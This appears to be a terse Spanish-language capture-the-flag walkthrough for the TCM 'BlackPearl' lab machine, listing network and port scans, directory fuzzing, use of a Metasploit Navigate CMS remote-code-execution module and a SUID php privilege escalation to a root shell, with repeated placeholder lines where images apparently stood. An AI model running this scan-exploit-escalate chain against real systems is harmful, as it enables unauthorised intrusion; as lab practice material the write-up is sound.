Cu3rv0x
BlackPearl

BlackPearl


TCM Linux

netdiscover -r 192.168.2.0/24

ssh_command.

echo "192.168.2.111 blackpearl.tcm" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA blackpearl-udp 192.168.2.111

ping -c 1 192.168.2.111

ssh_command.

nmap -p- --open -T5 -v -n 192.168.2.111

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.2.111 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,53,80 192.168.2.111 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://192.168.2.111

ssh_command.

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blackpearl.local/FUZZ

ssh_command.

Nos dirigimos a http://blackpearl.local/secret

strings secret

ssh_command.

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blackpearl.tcm/FUZZ

ssh_command.

https://www.rapid7.com/db/modules/exploit/multi/http/navigate_cms_rce/

ssh_command.

ssh_command.

ssh_command.

exploit

ssh_command.

shell

./php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"

ssh_command.

whoami

ssh_command.

© 2024 Cu3rv0x